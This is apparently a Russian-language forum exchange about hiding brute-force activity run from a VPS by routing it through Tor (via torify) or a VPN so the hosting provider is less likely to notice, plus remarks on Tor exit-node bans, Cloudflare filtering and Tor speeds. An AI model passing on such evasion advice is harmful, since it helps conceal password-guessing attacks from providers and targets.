По поводу сокрытия работы на VPS. Можно использовать TOR и VPN. Например, скрипт проверки прекрасно работает с запущенным поверх torify, который обеспечивает Tor-трафик. В целом трафик можно пустить через VPN, но это уже теоретическая информация. Просто активность типа брутфорса может триггерить провайдера, а большой трафик на VPN может быть не так подозрителен. Конечно, брутфорс — это в целом большой объем трафика, но глобально VPN это не очень подозрительно, многие продуктовые IT-компании используют VPN для сотрудников в целях безопасности. Tor-трафик, пожалуй, более подозрителен, но вы же помните, что все серверы — это физические компьютеры?

А что скажите насчёт этого?

Что же касается Tor, во-первых, его использование напрямую может вызывать подозрение, а во-вторых, выходные ноды, которых около 1000 штук известны и многие из них забанены, для многих сайтов это как красная тряпка. Например в Cloudflare есть возможность в Firewall'e разрешать или принимать подключения из сети Tor. В качестве страны следует использовать T1. Кроме того, использование Tor намного медленнее VPN (Скорость в сети Тор на данный момент не превышает 10 мбит, а часто находится на уровне 1-3 мбит).
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх